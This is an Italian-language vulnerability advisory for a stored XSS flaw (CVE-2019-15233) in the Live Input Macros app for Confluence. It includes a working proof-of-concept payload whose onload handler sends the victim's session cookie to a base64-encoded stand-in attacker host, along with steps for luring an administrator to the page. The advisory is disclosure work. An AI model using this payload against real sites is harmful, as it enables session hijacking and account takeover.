
Exploit proof-of-concept per CVE-2019-15233: vulnerabilità di Cross-Site Scripting (XSS) in Live Input Macros per Confluence, che consente il dirottamento della sessione tramite input dannoso.
(FAB-2019-00157) Vulnerabilità scoperta da me CVE-2019-15233
Avviso: advisory
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
Questa vulnerabilità di sicurezza è stata scoperta da Francesco Emanuel Bennici [email protected] di FABMation GmbH.
Live Input Macros offre agli Utenti la possibilità di aggiungere caselle di controllo, pulsanti di opzione, elenchi a discesa e altro ancora alle pagine di Confluence e apportare modifiche senza dover modificare la pagina.
Un attaccante può eseguire codice JavaScript sul sito Confluence se un utente aggiunge il codice dannoso.
Questo può essere utilizzato per rubare il cookie di sessione di un (es.) amministratore (hijacking della sessione).
Copia questo contenuto:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
E crea un nuovo Elemento su una pagina di Confluence. Incolla questo testo al suo interno e condividi la pagina di Confluence con (es.) un amministratore di sistema e se accede al sito, puoi dirottare/ "copiare" la sua sessione.